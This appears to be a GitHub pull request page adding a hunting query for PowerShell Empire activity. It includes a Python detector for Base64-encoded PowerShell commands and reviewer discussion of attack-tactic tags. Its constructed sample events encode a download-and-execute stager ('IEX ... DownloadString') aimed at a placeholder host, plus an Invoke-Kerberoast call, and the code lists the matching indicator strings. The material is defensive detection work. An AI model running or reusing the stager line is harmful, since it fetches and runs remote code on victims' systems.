PowerShell Empire related pages #203
base: master
[PowerShell Empire](https://www.powershellempire.com/) is a modular toolkit used both by penetration testers and malicious actors. It offers a wide range of attack techniques, and has been observed in numerous attacks.

The following query detects Base64-encoded PowerShell commands that are either process creation or network events. This can identify common techniques, such as [Kerberoasting](https://docs.microsoft.com/azure-advanced-threat-protection/atp-reconnaissance-alerts#security-principal-reconnaissance-ldap-external-id-2038).
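The hunting query itself is not reproduced on this page, so the following is an added example, not the PR's KQL and not code from the repository: a small Python detector that applies the same idea offline to constructed process-creation events. It locates the `-EncodedCommand` argument (any unambiguous prefix PowerShell accepts, including `-e`, `-ec` and `-enc`), decodes the payload as UTF-16LE (PowerShell's encoding for this argument, which a plain Base64-to-UTF-8 decode gets wrong), and reports every encoded invocation together with any well-known indicator strings found in the decoded script. The sample events and the `SUSPICIOUS_TOKENS` list are assumptions for illustration.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicator strings commonly seen in decoded stager/credential-access scripts.
# Assumed list for illustration; tune it to your environment.
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring",
    "net.webclient", "frombase64string", "invoke-kerberoast",
)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry): (device, image name, command line).
SAMPLE_EVENTS = [
    ("ws01", "powershell.exe",
     "powershell.exe -NoP -W Hidden -enc "
     + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")),
    ("ws02", "powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    ("srv01", "powershell.exe",
     "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date")),
    ("ws03", "powershell.exe",
     "powershell.exe -e " + encode_for_powershell("Invoke-Kerberoast")),
]


def extract_encoded_payload(cmdline: str) -> Optional[str]:
    """Return the Base64 argument that follows an -EncodedCommand style switch, if any.

    powershell.exe accepts -EncodedCommand, -ec, -e and any unambiguous prefix
    (-en, -enc, ...). -ExecutionPolicy (-ex, -ep) is not a prefix and is skipped.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith(("-", "/")):
            flag = tok[1:].lower()
            if flag and (flag == "ec" or "encodedcommand".startswith(flag)):
                return tokens[i + 1]
    return None


def decode_powershell_payload(b64: str) -> Optional[str]:
    """Decode an -EncodedCommand payload; None if it is not valid Base64/UTF-16LE."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (ValueError, binascii.Error):
        return None
    try:
        return raw.decode("utf-16-le")  # strict: odd-length or invalid data is rejected
    except UnicodeDecodeError:
        return None


@dataclass
class Finding:
    device: str
    decoded: str
    matched: Tuple[str, ...]  # indicator tokens present in the decoded script


def scan_events(events) -> List[Finding]:
    """Report every PowerShell process that ran an encoded command, with matched indicators."""
    findings: List[Finding] = []
    for device, image, cmdline in events:
        if image.lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        payload = extract_encoded_payload(cmdline)
        if payload is None:
            continue
        decoded = decode_powershell_payload(payload)
        if decoded is None:
            continue  # not a decodable payload; a real pipeline might still flag this
        lowered = decoded.lower()
        matched = tuple(t for t in SUSPICIOUS_TOKENS if t in lowered)
        findings.append(Finding(device, decoded, matched))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        severity = "HIGH" if f.matched else "INFO"
        print(f"[{severity}] {f.device}: {f.decoded!r} matched={f.matched}")
```

Encoded-but-benign invocations (the `Get-Date` event) are still reported at low severity, mirroring the broad scope of the hunting query; the indicator match is what separates a triage candidate from noise. Network events could be fed through the same functions by passing the initiating process's command line instead.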
@martyav @endisphotic, should we point this to:
I updated this with the latest commit (dd4e530)
| Persistence | |
| Privilege escalation | |
| Defense evasion | v |
| Credential Access | |
@martyav @endisphotic Credential access for Kerberoasting?
Added in the latest commit (dd4e530)
Please see comments.
Part of a series of pull requests, placing queries from the TA reports in the repo.
Some of the column names may be outdated, as some of the reports are quite old.
Others in the series:
#145, #155, #163, #165,
#168, #169, #170, #172,
#173, #174, #175, #177,
#178, #182, #183, #190,
#191, #192, #195, #196,
#198, #202